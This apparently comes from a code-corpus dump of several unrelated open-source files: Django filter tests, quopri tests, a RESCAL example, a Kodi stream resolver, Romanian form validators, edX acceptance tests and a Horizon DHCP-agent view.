timesince_filter(datetime.datetime(2005, 12, 29),
datetime.datetime(2005, 12, 30)),
u'1 day')
def test_timeuntil(self):
self.assertEqual(
timeuntil_filter(datetime.datetime.now() + datetime.timedelta(1, 1)),
u'1 day')
self.assertEqual(
timeuntil_filter(datetime.datetime(2005, 12, 30),
datetime.datetime(2005, 12, 29)),
u'1 day')
def test_default(self):
self.assertEqual(default(u"val", u"default"), u'val')
self.assertEqual(default(None, u"default"), u'default')
self.assertEqual(default(u'', u"default"), u'default')
def test_if_none(self):
self.assertEqual(default_if_none(u"val", u"default"), u'val')
self.assertEqual(default_if_none(None, u"default"), u'default')
self.assertEqual(default_if_none(u'', u"default"), u'')
def test_divisibleby(self):
self.assertEqual(divisibleby(4, 2), True)
self.assertEqual(divisibleby(4, 3), False)
def test_yesno(self):
self.assertEqual(yesno(True), u'yes')
self.assertEqual(yesno(False), u'no')
self.assertEqual(yesno(None), u'maybe')
self.assertEqual(yesno(True, u'certainly,get out of town,perhaps'),
u'certainly')
self.assertEqual(yesno(False, u'certainly,get out of town,perhaps'),
u'get out of town')
self.assertEqual(yesno(None, u'certainly,get out of town,perhaps'),
u'perhaps')
self.assertEqual(yesno(None, u'certainly,get out of town'),
u'get out of town')
def test_filesizeformat(self):
self.assertEqual(filesizeformat(1023), u'1023 bytes')
self.assertEqual(filesizeformat(1024), u'1.0 KB')
self.assertEqual(filesizeformat(10*1024), u'10.0 KB')
self.assertEqual(filesizeformat(1024*1024-1), u'1024.0 KB')
self.assertEqual(filesizeformat(1024*1024), u'1.0 MB')
self.assertEqual(filesizeformat(1024*1024*50), u'50.0 MB')
self.assertEqual(filesizeformat(1024*1024*1024-1), u'1024.0 MB')
self.assertEqual(filesizeformat(1024*1024*1024), u'1.0 GB')
self.assertEqual(filesizeformat(1024*1024*1024*1024), u'1.0 TB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024), u'1.0 PB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024*2000),
u'2000.0 PB')
self.assertEqual(filesizeformat(complex(1,-1)), u'0 bytes')
self.assertEqual(filesizeformat(""), u'0 bytes')
self.assertEqual(filesizeformat(u"\N{GREEK SMALL LETTER ALPHA}"),
u'0 bytes')
def test_localized_filesizeformat(self):
with self.settings(USE_L10N=True):
with translation.override('de', deactivate=True):
self.assertEqual(filesizeformat(1023), u'1023 Bytes')
self.assertEqual(filesizeformat(1024), u'1,0 KB')
self.assertEqual(filesizeformat(10*1024), u'10,0 KB')
self.assertEqual(filesizeformat(1024*1024-1), u'1024,0 KB')
self.assertEqual(filesizeformat(1024*1024), u'1,0 MB')
self.assertEqual(filesizeformat(1024*1024*50), u'50,0 MB')
self.assertEqual(filesizeformat(1024*1024*1024-1), u'1024,0 MB')
self.assertEqual(filesizeformat(1024*1024*1024), u'1,0 GB')
self.assertEqual(filesizeformat(1024*1024*1024*1024), u'1,0 TB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024),
u'1,0 PB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024*2000),
u'2000,0 PB')
self.assertEqual(filesizeformat(complex(1,-1)), u'0 Bytes')
self.assertEqual(filesizeformat(""), u'0 Bytes')
self.assertEqual(filesizeformat(u"\N{GREEK SMALL LETTER ALPHA}"),
u'0 Bytes')
def test_pluralize(self):
self.assertEqual(pluralize(1), u'')
self.assertEqual(pluralize(0), u's')
self.assertEqual(pluralize(2), u's')
self.assertEqual(pluralize([1]), u'')
self.assertEqual(pluralize([]), u's')
self.assertEqual(pluralize([1,2,3]), u's')
self.assertEqual(pluralize(1,u'es'), u'')
self.assertEqual(pluralize(0,u'es'), u'es')
self.assertEqual(pluralize(2,u'es'), u'es')
self.assertEqual(pluralize(1,u'y,ies'), u'y')
self.assertEqual(pluralize(0,u'y,ies'), u'ies')
self.assertEqual(pluralize(2,u'y,ies'), u'ies')
self.assertEqual(pluralize(0,u'y,ies,error'), u'')
def test_phone2numeric(self):
self.assertEqual(phone2numeric_filter(u'0800 flowers'), u'0800 3569377')
def test_non_string_input(self):
# Filters shouldn't break if passed non-strings
self.assertEqual(addslashes(123), u'123')
self.assertEqual(linenumbers(123), u'1. 123')
self.assertEqual(lower(123), u'123')
self.assertEqual(make_list(123), [u'1', u'2', u'3'])
self.assertEqual(slugify(123), u'123')
self.assertEqual(title(123), u'123')
self.assertEqual(truncatewords(123, 2), u'123')
self.assertEqual(upper(123), u'123')
self.assertEqual(urlencode(123), u'123')
self.assertEqual(urlize(123), u'123')
self.assertEqual(urlizetrunc(123, 1), u'123')
self.assertEqual(wordcount(123), 1)
self.assertEqual(wordwrap(123, 2), u'123')
self.assertEqual(ljust('123', 4), u'123 ')
self.assertEqual(rjust('123', 4), u' 123')
self.assertEqual(center('123', 5), u' 123 ')
self.assertEqual(center('123', 6), u' 123 ')
self.assertEqual(cut(123, '2'), u'13')
self.assertEqual(escape(123), u'123')
self.assertEqual(linebreaks_filter(123), u'<p>123</p>')
self.assertEqual(linebreaksbr(123), u'123')
self.assertEqual(removetags(123, 'a'), u'123')
self.assertEqual(striptags(123), u'123')
| bsd-3-clause |
durden/tablib | tablib/packages/odf/xforms.py | 96 | 1231 | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
from namespaces import XFORMSNS
from element import Element
# ODF 1.0 section 11.2
# XForms is designed to be embedded in another XML format.
# Autogenerated
def Model(**args):
return Element(qname = (XFORMSNS,'model'), **args)
def Instance(**args):
return Element(qname = (XFORMSNS,'instance'), **args)
def Bind(**args):
return Element(qname = (XFORMSNS,'bind'), **args)
| mit |
rversteegen/commandergenius | project/jni/python/src/Lib/test/test_quopri.py | 58 | 7365 | from test import test_support
import unittest
import sys, cStringIO, subprocess
import quopri
ENCSAMPLE = """\
Here's a bunch of special=20
=A1=A2=A3=A4=A5=A6=A7=A8=A9
=AA=AB=AC=AD=AE=AF=B0=B1=B2=B3
=B4=B5=B6=B7=B8=B9=BA=BB=BC=BD=BE
=BF=C0=C1=C2=C3=C4=C5=C6
=C7=C8=C9=CA=CB=CC=CD=CE=CF
=D0=D1=D2=D3=D4=D5=D6=D7
=D8=D9=DA=DB=DC=DD=DE=DF
=E0=E1=E2=E3=E4=E5=E6=E7
=E8=E9=EA=EB=EC=ED=EE=EF
=F0=F1=F2=F3=F4=F5=F6=F7
=F8=F9=FA=FB=FC=FD=FE=FF
characters... have fun!
"""
# First line ends with a space
DECSAMPLE = "Here's a bunch of special \n" + \
"""\
\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9
\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3
\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe
\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6
\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf
\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7
\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf
\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7
\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7
\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
characters... have fun!
"""
def withpythonimplementation(testfunc):
def newtest(self):
# Test default implementation
testfunc(self)
# Test Python implementation
if quopri.b2a_qp is not None or quopri.a2b_qp is not None:
oldencode = quopri.b2a_qp
olddecode = quopri.a2b_qp
try:
quopri.b2a_qp = None
quopri.a2b_qp = None
testfunc(self)
finally:
quopri.b2a_qp = oldencode
quopri.a2b_qp = olddecode
newtest.__name__ = testfunc.__name__
return newtest
class QuopriTestCase(unittest.TestCase):
# Each entry is a tuple of (plaintext, encoded string). These strings are
# used in the "quotetabs=0" tests.
STRINGS = (
# Some normal strings
('hello', 'hello'),
('''hello
there
world''', '''hello
there
world'''),
('''hello
there
world
''', '''hello
there
world
'''),
('\201\202\203', '=81=82=83'),
# Add some trailing MUST QUOTE strings
('hello ', 'hello=20'),
('hello\t', 'hello=09'),
# Some long lines. First, a single line of 108 characters
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\xd8\xd9\xda\xdb\xdc\xdd\xde\xdfxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx',
'''xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=D8=D9=DA=DB=DC=DD=DE=DFx=
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'''),
# A line of exactly 76 characters, no soft line break should be needed
('yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy',
'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy'),
# A line of 77 characters, forcing a soft line break at position 75,
# and a second line of exactly 2 characters (because the soft line
# break `=' sign counts against the line length limit).
('zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz',
'''zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=
zz'''),
# A line of 151 characters, forcing a soft line break at position 75,
# with a second line of exactly 76 characters and no trailing =
('zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz',
'''zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'''),
# A string containing a hard line break, but which the first line is
# 151 characters and the second line is exactly 76 characters. This
# should leave us with three lines, the first which has a soft line
# break, and which the second and third do not.
('''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz''',
'''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy=
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'''),
# Now some really complex stuff ;)
(DECSAMPLE, ENCSAMPLE),
)
# These are used in the "quotetabs=1" tests.
ESTRINGS = (
('hello world', 'hello=20world'),
('hello\tworld', 'hello=09world'),
)
# These are used in the "header=1" tests.
HSTRINGS = (
('hello world', 'hello_world'),
('hello_world', 'hello=5Fworld'),
)
@withpythonimplementation
def test_encodestring(self):
for p, e in self.STRINGS:
self.assert_(quopri.encodestring(p) == e)
@withpythonimplementation
def test_decodestring(self):
for p, e in self.STRINGS:
self.assert_(quopri.decodestring(e) == p)
@withpythonimplementation
def test_idempotent_string(self):
for p, e in self.STRINGS:
self.assert_(quopri.decodestring(quopri.encodestring(e)) == e)
@withpythonimplementation
def test_encode(self):
for p, e in self.STRINGS:
infp = cStringIO.StringIO(p)
outfp = cStringIO.StringIO()
quopri.encode(infp, outfp, quotetabs=False)
self.assert_(outfp.getvalue() == e)
@withpythonimplementation
def test_decode(self):
for p, e in self.STRINGS:
infp = cStringIO.StringIO(e)
outfp = cStringIO.StringIO()
quopri.decode(infp, outfp)
self.assert_(outfp.getvalue() == p)
@withpythonimplementation
def test_embedded_ws(self):
for p, e in self.ESTRINGS:
self.assert_(quopri.encodestring(p, quotetabs=True) == e)
self.assert_(quopri.decodestring(e) == p)
@withpythonimplementation
def test_encode_header(self):
for p, e in self.HSTRINGS:
self.assert_(quopri.encodestring(p, header=True) == e)
@withpythonimplementation
def test_decode_header(self):
for p, e in self.HSTRINGS:
self.assert_(quopri.decodestring(e, header=True) == p)
def test_scriptencode(self):
(p, e) = self.STRINGS[-1]
process = subprocess.Popen([sys.executable, "-mquopri"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
cout, cerr = process.communicate(p)
# On Windows, Python will output the result to stdout using
# CRLF, as the mode of stdout is text mode. To compare this
# with the expected result, we need to do a line-by-line comparison.
self.assertEqual(cout.splitlines(), e.splitlines())
def test_scriptdecode(self):
(p, e) = self.STRINGS[-1]
process = subprocess.Popen([sys.executable, "-mquopri", "-d"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
cout, cerr = process.communicate(e)
self.assertEqual(cout.splitlines(), p.splitlines())
def test_main():
test_support.run_unittest(QuopriTestCase)
if __name__ == "__main__":
test_main()
| lgpl-2.1 |
while519/rescal.py | examples/kinships.py | 9 | 2823 | #!/usr/bin/env python
import logging
logging.basicConfig(level=logging.INFO)
_log = logging.getLogger('Example Kinships')
import numpy as np
from numpy import dot, array, zeros, setdiff1d
from numpy.linalg import norm
from numpy.random import shuffle
from scipy.io.matlab import loadmat
from scipy.sparse import lil_matrix
from sklearn.metrics import precision_recall_curve, auc
from rescal import rescal_als
def predict_rescal_als(T):
A, R, _, _, _ = rescal_als(
T, 100, init='nvecs', conv=1e-3,
lambda_A=10, lambda_R=10
)
n = A.shape[0]
P = zeros((n, n, len(R)))
for k in range(len(R)):
P[:, :, k] = dot(A, dot(R[k], A.T))
return P
def normalize_predictions(P, e, k):
for a in range(e):
for b in range(e):
nrm = norm(P[a, b, :k])
if nrm != 0:
# round values for faster computation of AUC-PR
P[a, b, :k] = np.round_(P[a, b, :k] / nrm, decimals=3)
return P
def innerfold(T, mask_idx, target_idx, e, k, sz):
Tc = [Ti.copy() for Ti in T]
mask_idx = np.unravel_index(mask_idx, (e, e, k))
target_idx = np.unravel_index(target_idx, (e, e, k))
# set values to be predicted to zero
for i in range(len(mask_idx[0])):
Tc[mask_idx[2][i]][mask_idx[0][i], mask_idx[1][i]] = 0
# predict unknown values
P = predict_rescal_als(Tc)
P = normalize_predictions(P, e, k)
# compute area under precision recall curve
prec, recall, _ = precision_recall_curve(GROUND_TRUTH[target_idx], P[target_idx])
return auc(recall, prec)
if __name__ == '__main__':
# load data
mat = loadmat('data/alyawarradata.mat')
K = array(mat['Rs'], np.float32)
e, k = K.shape[0], K.shape[2]
SZ = e * e * k
# copy ground truth before preprocessing
GROUND_TRUTH = K.copy()
# construct array for rescal
T = [lil_matrix(K[:, :, i]) for i in range(k)]
_log.info('Datasize: %d x %d x %d | No. of classes: %d' % (
T[0].shape + (len(T),) + (k,))
)
# Do cross-validation
FOLDS = 10
IDX = list(range(SZ))
shuffle(IDX)
fsz = int(SZ / FOLDS)
offset = 0
AUC_train = zeros(FOLDS)
AUC_test = zeros(FOLDS)
for f in range(FOLDS):
idx_test = IDX[offset:offset + fsz]
idx_train = setdiff1d(IDX, idx_test)
shuffle(idx_train)
idx_train = idx_train[:fsz].tolist()
_log.info('Train Fold %d' % f)
AUC_train[f] = innerfold(T, idx_train + idx_test, idx_train, e, k, SZ)
_log.info('Test Fold %d' % f)
AUC_test[f] = innerfold(T, idx_test, idx_test, e, k, SZ)
offset += fsz
_log.info('AUC-PR Test Mean / Std: %f / %f' % (AUC_test.mean(), AUC_test.std()))
_log.info('AUC-PR Train Mean / Std: %f / %f' % (AUC_train.mean(), AUC_train.std()))
| gpl-3.0 |
RevolutionMC/Revolution | plugin.video.PsychoTV/resources/lib/resolvers/thefile.py | 23 | 1167 | # -*- coding: utf-8 -*-
'''
Specto Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from resources.lib.libraries import client
def resolve(url):
try:
url = url.replace('/embed-', '/')
url = re.compile('//.+?/([\w]+)').findall(url)[0]
url = 'http://thefile.me/plugins/mediaplayer/site/_embed.php?u=%s' % url
result = client.request(url, mobile=True)
url = re.compile('file *: *"(http.+?)"').findall(result)[-1]
return url
except:
return
| gpl-2.0 |
Mendeley/breakpad | src/tools/gyp/test/home_dot_gyp/gyptest-home-includes-regyp.py | 151 | 1287 | #!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies inclusion of $HOME/.gyp/includes.gypi works properly with relocation
and with regeneration.
"""
import os
import TestGyp
# Regenerating build files when a gyp file changes is currently only supported
# by the make generator.
test = TestGyp.TestGyp(formats=['make'])
os.environ['HOME'] = os.path.abspath('home')
test.run_gyp('all.gyp', chdir='src')
# After relocating, we should still be able to build (build file shouldn't
# contain relative reference to ~/.gyp/includes.gypi)
test.relocate('src', 'relocate/src')
test.build('all.gyp', test.ALL, chdir='relocate/src')
test.run_built_executable('printfoo',
chdir='relocate/src',
stdout="FOO is fromhome\n");
# Building should notice any changes to ~/.gyp/includes.gypi and regyp.
test.sleep()
test.write('home/.gyp/include.gypi', test.read('home2/.gyp/include.gypi'))
test.build('all.gyp', test.ALL, chdir='relocate/src')
test.run_built_executable('printfoo',
chdir='relocate/src',
stdout="FOO is fromhome2\n");
test.pass_test()
| bsd-3-clause |
marinho/geraldo | site/newsite/site-geraldo/django/contrib/localflavor/ro/forms.py | 35 | 6461 | # -*- coding: utf-8 -*-
"""
Romanian specific form helpers.
"""
import re
from django.forms import ValidationError, Field, RegexField, Select
from django.forms.fields import EMPTY_VALUES
from django.utils.translation import ugettext_lazy as _
class ROCIFField(RegexField):
"""
A Romanian fiscal identity code (CIF) field
For CIF validation algorithm see http://www.validari.ro/cui.html
"""
default_error_messages = {
'invalid': _("Enter a valid CIF."),
}
def __init__(self, *args, **kwargs):
super(ROCIFField, self).__init__(r'^[0-9]{2,10}', max_length=10,
min_length=2, *args, **kwargs)
def clean(self, value):
"""
CIF validation
"""
value = super(ROCIFField, self).clean(value)
if value in EMPTY_VALUES:
return u''
# strip RO part
if value[0:2] == 'RO':
value = value[2:]
key = '753217532'[::-1]
value = value[::-1]
key_iter = iter(key)
checksum = 0
for digit in value[1:]:
checksum += int(digit) * int(key_iter.next())
checksum = checksum * 10 % 11
if checksum == 10:
checksum = 0
if checksum != int(value[0]):
raise ValidationError(self.error_messages['invalid'])
return value[::-1]
class ROCNPField(RegexField):
"""
A Romanian personal identity code (CNP) field
For CNP validation algorithm see http://www.validari.ro/cnp.html
"""
default_error_messages = {
'invalid': _("Enter a valid CNP."),
}
def __init__(self, *args, **kwargs):
super(ROCNPField, self).__init__(r'^[1-9][0-9]{12}', max_length=13,
min_length=13, *args, **kwargs)
def clean(self, value):
"""
CNP validations
"""
value = super(ROCNPField, self).clean(value)
# check birthdate digits
import datetime
try:
datetime.date(int(value[1:3]),int(value[3:5]),int(value[5:7]))
except:
raise ValidationError(self.error_messages['invalid'])
# checksum
key = '279146358279'
checksum = 0
value_iter = iter(value)
for digit in key:
checksum += int(digit) * int(value_iter.next())
checksum %= 11
if checksum == 10:
checksum = 1
if checksum != int(value[12]):
raise ValidationError(self.error_messages['invalid'])
return value
class ROCountyField(Field):
"""
A form field that validates its input is a Romanian county name or
abbreviation. It normalizes the input to the standard vehicle registration
abbreviation for the given county
WARNING: This field will only accept names written with diacritics; consider
using ROCountySelect if this behavior is unnaceptable for you
Example:
Argeş => valid
Arges => invalid
"""
default_error_messages = {
'invalid': u'Enter a Romanian county code or name.',
}
def clean(self, value):
from ro_counties import COUNTIES_CHOICES
super(ROCountyField, self).clean(value)
if value in EMPTY_VALUES:
return u''
try:
value = value.strip().upper()
except AttributeError:
pass
# search for county code
for entry in COUNTIES_CHOICES:
if value in entry:
return value
# search for county name
normalized_CC = []
for entry in COUNTIES_CHOICES:
normalized_CC.append((entry[0],entry[1].upper()))
for entry in normalized_CC:
if entry[1] == value:
return entry[0]
raise ValidationError(self.error_messages['invalid'])
class ROCountySelect(Select):
"""
A Select widget that uses a list of Romanian counties (judete) as its
choices.
"""
def __init__(self, attrs=None):
from ro_counties import COUNTIES_CHOICES
super(ROCountySelect, self).__init__(attrs, choices=COUNTIES_CHOICES)
class ROIBANField(RegexField):
"""
Romanian International Bank Account Number (IBAN) field
For Romanian IBAN validation algorithm see http://validari.ro/iban.html
"""
default_error_messages = {
'invalid': _('Enter a valid IBAN in ROXX-XXXX-XXXX-XXXX-XXXX-XXXX format'),
}
def __init__(self, *args, **kwargs):
super(ROIBANField, self).__init__(r'^[0-9A-Za-z\-\s]{24,40}$',
max_length=40, min_length=24, *args, **kwargs)
def clean(self, value):
"""
Strips - and spaces, performs country code and checksum validation
"""
value = super(ROIBANField, self).clean(value)
value = value.replace('-','')
value = value.replace(' ','')
value = value.upper()
if value[0:2] != 'RO':
raise ValidationError(self.error_messages['invalid'])
numeric_format = ''
for char in value[4:] + value[0:4]:
if char.isalpha():
numeric_format += str(ord(char) - 55)
else:
numeric_format += char
if int(numeric_format) % 97 != 1:
raise ValidationError(self.error_messages['invalid'])
return value
class ROPhoneNumberField(RegexField):
"""Romanian phone number field"""
default_error_messages = {
'invalid': _('Phone numbers must be in XXXX-XXXXXX format.'),
}
def __init__(self, *args, **kwargs):
super(ROPhoneNumberField, self).__init__(r'^[0-9\-\(\)\s]{10,20}$',
max_length=20, min_length=10, *args, **kwargs)
def clean(self, value):
"""
Strips -, (, ) and spaces. Checks the final length.
"""
value = super(ROPhoneNumberField, self).clean(value)
value = value.replace('-','')
value = value.replace('(','')
value = value.replace(')','')
value = value.replace(' ','')
if len(value) != 10:
raise ValidationError(self.error_messages['invalid'])
return value
class ROPostalCodeField(RegexField):
"""Romanian postal code field."""
default_error_messages = {
'invalid': _('Enter a valid postal code in the format XXXXXX'),
}
def __init__(self, *args, **kwargs):
super(ROPostalCodeField, self).__init__(r'^[0-9][0-8][0-9]{4}$',
max_length=6, min_length=6, *args, **kwargs)
| lgpl-3.0 |
proversity-org/edx-platform | common/test/acceptance/tests/lms/test_programs.py | 10 | 5800 | """Acceptance tests for LMS-hosted Programs pages"""
from nose.plugins.attrib import attr
from common.test.acceptance.fixtures.catalog import CatalogFixture, CatalogIntegrationMixin
from common.test.acceptance.fixtures.course import CourseFixture
from common.test.acceptance.fixtures.programs import ProgramsConfigMixin
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.lms.catalog import CacheProgramsPage
from common.test.acceptance.pages.lms.programs import ProgramDetailsPage, ProgramListingPage
from common.test.acceptance.tests.helpers import UniqueCourseTest
from openedx.core.djangoapps.catalog.tests.factories import (
CourseFactory,
CourseRunFactory,
ProgramFactory,
ProgramTypeFactory
)
class ProgramPageBase(ProgramsConfigMixin, CatalogIntegrationMixin, UniqueCourseTest):
"""Base class used for program listing page tests."""
def setUp(self):
super(ProgramPageBase, self).setUp()
self.set_programs_api_configuration(is_enabled=True)
self.programs = ProgramFactory.create_batch(3)
self.username = None
def auth(self, enroll=True):
"""Authenticate, enrolling the user in the configured course if requested."""
CourseFixture(**self.course_info).install()
course_id = self.course_id if enroll else None
auth_page = AutoAuthPage(self.browser, course_id=course_id)
auth_page.visit()
self.username = auth_page.user_info['username']
def create_program(self):
"""DRY helper for creating test program data."""
course_run = CourseRunFactory(key=self.course_id)
course = CourseFactory(course_runs=[course_run])
program_type = ProgramTypeFactory()
return ProgramFactory(courses=[course], type=program_type['name'])
def stub_catalog_api(self, programs):
"""
Stub the discovery service's program list and detail API endpoints.
"""
self.set_catalog_integration(is_enabled=True, service_username=self.username)
CatalogFixture().install_programs(programs)
program_types = [program['type'] for program in programs]
CatalogFixture().install_program_types(program_types)
def cache_programs(self):
"""
Populate the LMS' cache of program data.
"""
cache_programs_page = CacheProgramsPage(self.browser)
cache_programs_page.visit()
class ProgramListingPageTest(ProgramPageBase):
"""Verify user-facing behavior of the program listing page."""
def setUp(self):
super(ProgramListingPageTest, self).setUp()
self.listing_page = ProgramListingPage(self.browser)
def test_no_enrollments(self):
"""Verify that no cards appear when the user has no enrollments."""
self.auth(enroll=False)
self.stub_catalog_api(self.programs)
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertFalse(self.listing_page.are_cards_present)
def test_no_programs(self):
"""
Verify that no cards appear when the user has enrollments
but none are included in an active program.
"""
self.auth()
self.stub_catalog_api(self.programs)
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertFalse(self.listing_page.are_cards_present)
def test_enrollments_and_programs(self):
"""
Verify that cards appear when the user has enrollments
which are included in at least one active program.
"""
self.auth()
program = self.create_program()
self.stub_catalog_api(programs=[program])
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertTrue(self.listing_page.are_cards_present)
@attr('a11y')
class ProgramListingPageA11yTest(ProgramPageBase):
"""Test program listing page accessibility."""
def setUp(self):
super(ProgramListingPageA11yTest, self).setUp()
self.listing_page = ProgramListingPage(self.browser)
self.program = self.create_program()
def test_empty_a11y(self):
"""Test a11y of the page's empty state."""
self.auth(enroll=False)
self.stub_catalog_api(programs=[self.program])
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertFalse(self.listing_page.are_cards_present)
self.listing_page.a11y_audit.check_for_accessibility_errors()
def test_cards_a11y(self):
"""Test a11y when program cards are present."""
self.auth()
self.stub_catalog_api(programs=[self.program])
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertTrue(self.listing_page.are_cards_present)
self.listing_page.a11y_audit.check_for_accessibility_errors()
@attr('a11y')
class ProgramDetailsPageA11yTest(ProgramPageBase):
"""Test program details page accessibility."""
def setUp(self):
super(ProgramDetailsPageA11yTest, self).setUp()
self.details_page = ProgramDetailsPage(self.browser)
self.program = self.create_program()
self.program['uuid'] = self.details_page.program_uuid
def test_a11y(self):
"""Test the page's a11y compliance."""
self.auth()
self.stub_catalog_api(programs=[self.program])
self.cache_programs()
self.details_page.visit()
self.details_page.a11y_audit.check_for_accessibility_errors()
| agpl-3.0 |
philoniare/horizon | openstack_dashboard/dashboards/admin/networks/agents/views.py | 23 | 3020 | # Copyright 2014 Kylincloud
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard.dashboards.admin.networks.agents \
import forms as project_forms
class AddView(forms.ModalFormView):
form_class = project_forms.AddDHCPAgent
form_id = "add_dhcp_agent_form"
template_name = 'admin/networks/agents/add.html'
success_url = 'horizon:admin:networks:detail'
failure_url = 'horizon:admin:networks:detail'
submit_url = "horizon:admin:networks:adddhcpagent"
title_and_label = _("Add DHCP Agent")
submit_label = modal_header = page_title = title_and_label
def get_success_url(self):
return reverse(self.success_url,
args=(self.kwargs['network_id'],))
def get_context_data(self, **kwargs):
context = super(AddView, self).get_context_data(**kwargs)
context['network_id'] = self.kwargs['network_id']
args = (self.kwargs['network_id'],)
context['submit_url'] = reverse(self.submit_url, args=args)
context['cancel_url'] = reverse(self.failure_url, args=args)
return context
def get_initial(self):
initial = super(AddView, self).get_initial()
agents = self._get_agents()
network_id = self.kwargs['network_id']
try:
network = api.neutron.network_get(self.request, network_id)
initial.update({"network_id": network_id,
"network_name": network.name_or_id,
"agents": agents})
return initial
except Exception:
redirect = reverse(self.failure_url,
args=(self.kwargs['network_id'],))
msg = _("Unable to retrieve network.")
exceptions.handle(self.request, msg, redirect=redirect)
@memoized.memoized_method
def _get_agents(self):
try:
return api.neutron.agent_list(self.request,
agent_type='DHCP agent')
except Exception:
redirect = reverse(self.failure_url,
args=(self.kwargs['network_id'],))
msg = _("Unable to retrieve agent list.")
exceptions.handle(self.request, msg, redirect=redirect)
| apache-2.0 |
